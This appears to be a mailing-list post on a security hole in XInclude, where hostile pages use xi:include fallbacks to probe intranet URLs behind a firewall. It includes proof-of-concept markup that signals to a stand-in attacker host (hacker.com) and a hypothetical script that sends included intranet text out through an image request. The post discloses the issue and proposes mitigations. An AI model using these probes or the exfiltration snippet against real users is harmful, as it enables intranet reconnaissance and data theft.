Consider the following document:
<html xmlns:xi="http://www.w3.org/2001/XInclude">
<body>
Here's what the user normally sees
</body>
<span style="display: none">
<xi:include parse="text" href="http://www.behindthefirewall.com/someURL">
<xi:fallback>
<xi:include parse="text" href="http://www.hacker.com/?someURL=doesNotExist"/>
</xi:fallback>
</xi:include>
</span>
</html>
Once a local user has loaded this into a web browser from behind the
firewall, the original host site or some other remote site can easily
determine whether some document exists on some server that would not
normally be accessible to it. This scheme is not perfectly reliable.
The biggest problem is that the attacker must have some good guesses
as to likely local URLs, and also some reason to want to know them;
but it seems to have the potential to expose information from behind
the firewall that the user might not wish exposed.
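For instance, a hostile page could line up several guesses at once and
give each fallback a distinct query string, so that the attacker's logs
show exactly which guesses failed to load. (The intranet paths below
are invented for illustration; as before, behindthefirewall.com stands
in for the protected host and hacker.com for the attacker's server.)
<span style="display: none">
<xi:include parse="text" href="http://www.behindthefirewall.com/payroll/">
<xi:fallback>
<xi:include parse="text" href="http://www.hacker.com/?miss=payroll"/>
</xi:fallback>
</xi:include>
<xi:include parse="text" href="http://www.behindthefirewall.com/hr/reviews/">
<xi:fallback>
<xi:include parse="text" href="http://www.hacker.com/?miss=hr-reviews"/>
</xi:fallback>
</xi:include>
</span>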
How bad is this? Does this do anything a hacker can't do with IMG
tags or external entity references now? I do think this is worse than
those cases because fallbacks let the result of the load be
communicated back to the original host (or a different one). The
remote host can tell whether the request succeeded by whether the
URL inside the fallback is requested.
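To make the contrast concrete: without any script at all, an image
probe like the one below still makes the browser contact the intranet
host, but the attacker's server never hears whether that fetch
succeeded; the fallback version above reports the failure case directly.
<img src="http://www.behindthefirewall.com/someURL" />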
Combined with JavaScript and DHTML, this attack could become a lot
more effective. If the browser exposes the post-include DOM to any
such technology, then this would allow the remote site to gather
information from normally restricted pages on the Intranet. I'm not
sure how plausible that is. The comments of some JavaScript experts
would be helpful. Java normally does not allow applets to load URLs
from hosts other than the applet host, for precisely this reason.
However, if the data from those URLs could be loaded into the local
page by some other mechanism, and Java or JavaScript could then get
access to it, this would punch a huge hole in the firewall.
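Purely as a sketch of that hypothetical (it assumes a browser that
performs XInclude before scripts run and then exposes the included
text in the DOM, which as far as I know none does), the hostile page
might look something like this; the element id and the collect URL
are invented for illustration:
<div id="included" style="display: none">
<xi:include parse="text" href="http://www.behindthefirewall.com/someURL">
<xi:fallback></xi:fallback>
</xi:include>
</div>
<script type="text/javascript">
// Hypothetical: read whatever text the XInclude processor left in the div
var stolen = document.getElementById("included").innerHTML;
// Smuggle it back out by requesting an attacker-controlled URL with the data attached
new Image().src = "http://www.hacker.com/collect?data=" + escape(stolen);
</script>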
Partly this depends on browser security models. However, I suspect
it's at least bad enough that browser vendors and other XInclude
users should be made aware of the issues, and that perhaps browsers
should not perform XInclude processing by default; or perhaps it
would be enough just not to process fallbacks. Or not to make the
post-inclusion DOM available through scripting. Or to limit the URLs
included to ones from the same host the base page came from.
Thoughts?
--
+-----------------------+------------------------+-------------------+
| Elliotte Rusty Harold | elharo@metalab.unc.edu | Writer/Programmer |
+-----------------------+------------------------+-------------------+
| XML in a Nutshell, 2nd Edition (O'Reilly, 2002) |
| http://www.cafeconleche.org/books/xian2/ |
| http://www.amazon.com/exec/obidos/ISBN%3D0596002920/cafeaulaitA/ |
+----------------------------------+---------------------------------+
| Read Cafe au Lait for Java News: http://www.cafeaulait.org/ |
| Read Cafe con Leche for XML News: http://www.cafeconleche.org/ |
+----------------------------------+---------------------------------+